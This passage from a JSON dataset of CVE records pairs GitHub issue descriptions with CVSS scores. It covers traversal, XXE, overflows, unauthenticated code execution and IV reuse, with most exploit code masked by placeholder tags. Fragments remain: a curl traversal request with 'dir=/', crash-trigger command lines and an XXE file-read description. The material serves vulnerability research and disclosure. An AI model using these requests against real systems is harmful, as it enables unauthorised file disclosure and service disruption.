  4675. "description": "Security in connectors. The connectors allow a directory traversal attack in the default settings: the dir parameter is passed through to the filesystem, so a request such as the one below lists the filesystem root. POC: curl ' FILETAG H APITAG xxx' d \"dir=/\"",
  4676. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  4677. "severity": "HIGH",
  4678. "baseScore": 7.5,
  4679. "impactScore": 3.6,
  4680. "exploitabilityScore": 3.9
  4681. },
  4682. {
  4683. "CVE_ID": "CVE-2017-1000171",
  4684. "Issue_Url_old": "https://github.com/MaharaProject/mahara-mobile/issues/33",
  4685. "Issue_Url_new": "https://github.com/maharaproject/mahara-mobile-cordova/issues/33",
  4686. "Repo_new": "maharaproject/mahara-mobile-cordova",
  4687. "Issue_Created_At": "2017-05-22T22:25:49Z",
  4688. "description": "Logging of passwords in Mahara from Mahara Mobile. A security fix was released for Mahara Mobile in February NUMBERTAG in commit URLTAG. Pawel Kubzdyl uncovered an issue in Mahara Mobile that caused passwords to be logged in plain text to the Mahara access log (note that access logs written before the fix may still contain them).",
  4689. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4690. "severity": "CRITICAL",
  4691. "baseScore": 9.8,
  4692. "impactScore": 5.9,
  4693. "exploitabilityScore": 3.9
  4694. },
  4695. {
  4696. "CVE_ID": "CVE-2017-1000172",
  4697. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/144",
  4698. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/144",
  4699. "Repo_new": "marcobambini/gravity",
  4700. "Issue_Created_At": "2017-04-26T02:39:22Z",
  4701. "description": "Heap Double Free / Use After Free. APITAG APITAG CODETAG ERRORTAG ERRORTAG CODETAG",
  4702. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4703. "severity": "CRITICAL",
  4704. "baseScore": 9.8,
  4705. "impactScore": 5.9,
  4706. "exploitabilityScore": 3.9
  4707. },
  4708. {
  4709. "CVE_ID": "CVE-2017-1000173",
  4710. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/172",
  4711. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/172",
  4712. "Repo_new": "marcobambini/gravity",
  4713. "Issue_Created_At": "2017-07-07T16:43:31Z",
  4714. "description": "Gravity Heap Buffer Overflow (list_join). Gravity is vulnerable to a Heap Buffer Overflow that could result in a potentially exploitable condition. Compiled on: Ubuntu NUMBERTAG POC: CODETAG By creating a large loop while pushing data to a buffer, we can get past the bounds checking of that buffer. When APITAG is called on the data it will read past the buffer, resulting in a Heap Buffer Overflow. GDB Output: FILETAG Arbitrary write to Heap: FILETAG",
  4715. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4716. "severity": "CRITICAL",
  4717. "baseScore": 9.8,
  4718. "impactScore": 5.9,
  4719. "exploitabilityScore": 3.9
  4720. },
  4721. {
  4722. "CVE_ID": "CVE-2017-1000174",
  4723. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/21",
  4724. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/21",
  4725. "Repo_new": "matthiaskramm/swftools",
  4726. "Issue_Created_At": "2017-06-11T13:55:26Z",
  4727. "description": "APITAG Address Access Except. crash : URLTAG url trigger : ./swfdump APITAG Crash Detail : ERRORTAG",
  4728. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4729. "severity": "MEDIUM",
  4730. "baseScore": 5.5,
  4731. "impactScore": 3.6,
  4732. "exploitabilityScore": 1.8
  4733. },
  4734. {
  4735. "CVE_ID": "CVE-2017-1000176",
  4736. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/23",
  4737. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/23",
  4738. "Repo_new": "matthiaskramm/swftools",
  4739. "Issue_Created_At": "2017-06-11T14:01:50Z",
  4740. "description": "swfc APITAG crash. Crash : URLTAG url Trigger : ./swfc swftools/swfc_crash_mem_put_ Crash Detail : ERRORTAG",
  4741. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4742. "severity": "MEDIUM",
  4743. "baseScore": 5.5,
  4744. "impactScore": 3.6,
  4745. "exploitabilityScore": 1.8
  4746. },
  4747. {
  4748. "CVE_ID": "CVE-2017-1000182",
  4749. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/30",
  4750. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/30",
  4751. "Repo_new": "matthiaskramm/swftools",
  4752. "Issue_Created_At": "2017-06-11T14:17:17Z",
  4753. "description": "wa NUMBERTAG swf memory leak. Crash : URLTAG url Trigger : ./wa NUMBERTAG swf APITAG Crash Detail : ERRORTAG",
  4754. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4755. "severity": "MEDIUM",
  4756. "baseScore": 5.5,
  4757. "impactScore": 3.6,
  4758. "exploitabilityScore": 1.8
  4759. },
  4760. {
  4761. "CVE_ID": "CVE-2017-1000185",
  4762. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/33",
  4763. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/33",
  4764. "Repo_new": "matthiaskramm/swftools",
  4765. "Issue_Created_At": "2017-06-11T14:30:32Z",
  4766. "description": "gif2swf APITAG memcpy overflow. Crash : URLTAG url Trigger : ./gif2swf r NUMBERTAG o /dev/null z swftools/git2swf_ r NUMBERTAG o_dev_null_ z_memory_corruption__fopen Crash Detail : PATHTAG ./gif2swf r NUMBERTAG o /dev/null z swftools/git2swf_ r NUMBERTAG o_dev_null_ z_memory_corruption__fopen APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG c NUMBERTAG f NUMBERTAG at pc NUMBERTAG ff NUMBERTAG bb NUMBERTAG bp NUMBERTAG fff NUMBERTAG b NUMBERTAG sp NUMBERTAG fff NUMBERTAG b NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG c NUMBERTAG f NUMBERTAG thread T NUMBERTAG ff NUMBERTAG bb NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG b4 in APITAG ( PATHTAG NUMBERTAG a NUMBERTAG in main ( PATHTAG NUMBERTAG ff NUMBERTAG b0e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG ff8 in _start ( PATHTAG NUMBERTAG c NUMBERTAG f NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ff NUMBERTAG bba NUMBERTAG in malloc ( PATHTAG NUMBERTAG d5 in APITAG ( PATHTAG ) SUMMARY: APITAG heap buffer overflow NUMBERTAG asan_memcpy Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff8d NUMBERTAG c NUMBERTAG fff8da NUMBERTAG c NUMBERTAG fff8db NUMBERTAG c NUMBERTAG fff8dc NUMBERTAG c NUMBERTAG fff8dd NUMBERTAG c NUMBERTAG fff8de NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8e NUMBERTAG c NUMBERTAG fff8e NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 
Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  4767. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4768. "severity": "MEDIUM",
  4769. "baseScore": 5.5,
  4770. "impactScore": 3.6,
  4771. "exploitabilityScore": 1.8
  4772. },
  4773. {
  4774. "CVE_ID": "CVE-2017-1000186",
  4775. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/34",
  4776. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/34",
  4777. "Repo_new": "matthiaskramm/swftools",
  4778. "Issue_Created_At": "2017-06-12T02:31:00Z",
  4779. "description": "pdf2swf stack overflow. Crash : URLTAG url Trigger : ./pdf2swf z i w b l f G I o /den/null swftools/pdf2swf_ z_ i_ w_ b_ l_ f_ G_ I_ APITAG Crash Detail : PATHTAG ./pdf2swf z i w b l f G I o /den/null swftools/pdf2swf_ z_ i_ w_ b_ l_ f_ G_ I_ APITAG ASAN:DEADLYSIGNAL APITAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffc6f NUMBERTAG ff0 (pc NUMBERTAG d NUMBERTAG e bp NUMBERTAG sp NUMBERTAG ffc6f NUMBERTAG ff0 T NUMBERTAG d NUMBERTAG d ( PATHTAG NUMBERTAG e ( PATHTAG NUMBERTAG bd NUMBERTAG PATHTAG NUMBERTAG ce NUMBERTAG PATHTAG NUMBERTAG ce NUMBERTAG PATHTAG NUMBERTAG cfaf ( PATHTAG NUMBERTAG cfc6 ( PATHTAG NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ca NUMBERTAG PATHTAG NUMBERTAG a4c0 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c 
NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d 
( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG 
NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG ) SUMMARY: APITAG stack overflow ( PATHTAG NUMBERTAG ABORTING",
  4780. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4781. "severity": "MEDIUM",
  4782. "baseScore": 5.5,
  4783. "impactScore": 3.6,
  4784. "exploitabilityScore": 1.8
  4785. },
  4786. {
  4787. "CVE_ID": "CVE-2017-1000187",
  4788. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/36",
  4789. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/36",
  4790. "Repo_new": "matthiaskramm/swftools",
  4791. "Issue_Created_At": "2017-06-12T02:34:21Z",
  4792. "description": "pdf2swf Invalid Address Access. Crash : URLTAG url Trigger : ./pdf2swf z i w b l f G I o /den/null swftools/pdf2swf_ z_ i_ w_ b_ l_ f_ G_ I_ APITAG Crash Detail : PATHTAG ./pdf2swf z i w b l f G I o /den/null swftools/pdf2swf_ z_ i_ w_ b_ l_ f_ G_ I_ APITAG ASAN:DEADLYSIGNAL APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG c (pc NUMBERTAG bc NUMBERTAG bp NUMBERTAG sp NUMBERTAG ffda NUMBERTAG c NUMBERTAG T NUMBERTAG bc NUMBERTAG PATHTAG NUMBERTAG e NUMBERTAG f6 ( PATHTAG NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG d2e2e ( PATHTAG NUMBERTAG b4ad0 ( PATHTAG NUMBERTAG da ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG f3 ( PATHTAG NUMBERTAG fca ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d6f7 ( PATHTAG NUMBERTAG ae NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG f ( PATHTAG NUMBERTAG f2c NUMBERTAG PATHTAG NUMBERTAG fd NUMBERTAG f ( PATHTAG NUMBERTAG cef8 ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG NUMBERTAG ABORTING",
  4793. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  4794. "severity": "HIGH",
  4795. "baseScore": 7.8,
  4796. "impactScore": 5.9,
  4797. "exploitabilityScore": 1.8
  4798. },
  4799. {
  4800. "CVE_ID": "CVE-2017-1000190",
  4801. "Issue_Url_old": "https://github.com/ngallagher/simplexml/issues/18",
  4802. "Issue_Url_new": "https://github.com/ngallagher/simplexml/issues/18",
  4803. "Repo_new": "ngallagher/simplexml",
  4804. "Issue_Created_At": "2016-10-25T16:16:25Z",
  4805. "description": "XXE vulnerability in APITAG Hi, there. Recently, I learned about APITAG and tried my luck to find some bugs. Here is what I found. As you know, APITAG can serialize and deserialize XML documents. So I tested these functions and finally I found they can lead to an XXE vulnerability. First, I tried to inject payloads into the attributes. However, APITAG cannot resolve external entities in element attributes. CODETAG It will raise an exception when resolving the XML document above because APITAG cannot resolve external entities in attributes. However, external entities can be used in elements' text nodes: CODETAG When deserializing the document above, we can retrieve the content of win.ini on the C drive. Also, we can use the http, gopher and dict protocols in an XXE attack. More details in APITAG version is NUMBERTAG Besides, Retrofit is also affected by this vulnerability because of the usage of APITAG inside. FILETAG FILETAG To fix it, you can limit the resolving of external entities in XML documents. Let me know if you have problems reproducing this issue. Thanks!",
  4806. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  4807. "severity": "CRITICAL",
  4808. "baseScore": 9.1,
  4809. "impactScore": 5.2,
  4810. "exploitabilityScore": 3.9
  4811. },
  4812. {
  4813. "CVE_ID": "CVE-2017-1000191",
  4814. "Issue_Url_old": "https://github.com/NICMx/Jool/issues/232",
  4815. "Issue_Url_new": "https://github.com/nicmx/jool/issues/232",
  4816. "Repo_new": "nicmx/jool",
  4817. "Issue_Created_At": "2016-11-10T12:22:58Z",
  4818. "description": "Kernel crash with Jool NUMBERTAG One of our SIIT DC BRs just crashed. It's an NUMBERTAG server running Ubuntu NUMBERTAG and kernel NUMBERTAG generic. This could be the hardware going faulty for all I know (it's the first time this has happened), but I'm including the oops from the serial console below. It mentions various Jool related functions, so I'm assuming you'd be interested in taking a look. ERRORTAG `",
  4819. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  4820. "severity": "HIGH",
  4821. "baseScore": 7.5,
  4822. "impactScore": 3.6,
  4823. "exploitabilityScore": 3.9
  4824. },
  4825. {
  4826. "CVE_ID": "CVE-2017-1000199",
  4827. "Issue_Url_old": "https://github.com/open-iscsi/tcmu-runner/issues/194",
  4828. "Issue_Url_new": "https://github.com/open-iscsi/tcmu-runner/issues/194",
  4829. "Repo_new": "open-iscsi/tcmu-runner",
  4830. "Issue_Created_At": "2017-07-14T15:48:00Z",
  4831. "description": "Security information leak in internal qcow handler's check_config callback. The implementation of qcow_check_config presents an information leak, because it allows any user with access to the dbus system bus to check for the existence of files and directories, even if the user shouldn't have access to those files. For example, issuing this command as a regular user reveals whether APITAG exists: dbus send system print reply APITAG PATHTAG APITAG PATHTAG These kinds of information leaks in combination with other security issues often leverage more serious security issues. I'd have suggested a bugfix for this but it is difficult to get right. If we knew the peer credentials from dbus we could do a comparison of those credentials against the target file credentials. This still would be difficult for corner cases, where the file itself would be accessible to the user, but not some of the upper components of the path. The check_config callback currently does not provide a possibility to pass peer credential information in, so this would affect public API in some way. Also I've not found a simple way to get the dbus peer credentials via libgio, maybe by using a APITAG All quite complicated, might be easier to drop this config callback altogether.",
  4832. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  4833. "severity": "HIGH",
  4834. "baseScore": 7.5,
  4835. "impactScore": 3.6,
  4836. "exploitabilityScore": 3.9
  4837. },
  4838. {
  4839. "CVE_ID": "CVE-2017-1000212",
  4840. "Issue_Url_old": "https://github.com/tonini/alchemist-server/issues/14",
  4841. "Issue_Url_new": "https://github.com/tonini/alchemist-server/issues/14",
  4842. "Repo_new": "tonini/alchemist-server",
  4843. "Issue_Created_At": "2017-02-21T22:40:55Z",
  4844. "description": "Server executes arbitrary code from remote machines. alchemist server starts a server that executes arbitrary code from any host that can reach you on the network, without any kind of authentication. APITAG Take note of the port, because the exploit below doesn't brute force the port (though this could easily be done by an attacker). CODETAG This also works from a remote machine because alchemist server listens on all interfaces, not just localhost. Listening on localhost by default would be a good idea, but is insufficient, because it still leaves the user open to attacks from other (less trusted) users on the machine, and possibly from the user's web browser via a DNS rebinding attack. Requiring a secret cookie before accepting any requests would be a good idea (beware, though, the secret needs a constant time comparison). Even better would be to use a UNIX socket.",
  4845. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4846. "severity": "CRITICAL",
  4847. "baseScore": 9.8,
  4848. "impactScore": 5.9,
  4849. "exploitabilityScore": 3.9
  4850. },
  4851. {
  4852. "CVE_ID": "CVE-2017-1000218",
  4853. "Issue_Url_old": "https://github.com/hfiref0x/LightFTP/issues/5",
  4854. "Issue_Url_new": "https://github.com/hfiref0x/lightftp/issues/5",
  4855. "Repo_new": "hfiref0x/lightftp",
  4856. "Issue_Created_At": "2017-07-06T11:37:42Z",
  4857. "description": "Security buffer overflow. Hello, I've noticed a buffer overflow in the Unix version of APITAG This happens in the \"writelogentry\" function. With this payload : APITAG With this configuration : CODETAG POC : CODETAG This buffer overflow can lead to remote code execution or a denial of service. I hope this will help you to fix the vuln.",
  4858. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4859. "severity": "CRITICAL",
  4860. "baseScore": 9.8,
  4861. "impactScore": 5.9,
  4862. "exploitabilityScore": 3.9
  4863. },
  4864. {
  4865. "CVE_ID": "CVE-2017-1000246",
  4866. "Issue_Url_old": "https://github.com/rohe/pysaml2/issues/417",
  4867. "Issue_Url_new": "https://github.com/identitypython/pysaml2/issues/417",
  4868. "Repo_new": "identitypython/pysaml2",
  4869. "Issue_Created_At": "2017-05-24T15:21:53Z",
  4870. "description": "Reuse of AES initialization vector in APITAG / APITAG / Server. The Server URLTAG class randomly generates a fixed NUMBERTAG byte initialization vector (IV) for the purpose of encrypting data. Then, via the APITAG URLTAG class, that fixed IV makes its way to the APITAG class, where it is consistently reused for encrypting data. Initialization vector reuse like this is a security concern, since it leaks information about the encrypted data to attackers, regardless of the encryption mode used. For example, if the IV is reused with the same key in AES CTR mode, the attacker will very likely be able to entirely decrypt the encrypted data: URLTAG Instead of relying on a fixed, randomly generated IV, it would be better to randomly generate a new IV for every encryption operation. Here are a couple of links that have more information on why that is the preferred approach: FILETAG URLTAG",
  4871. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
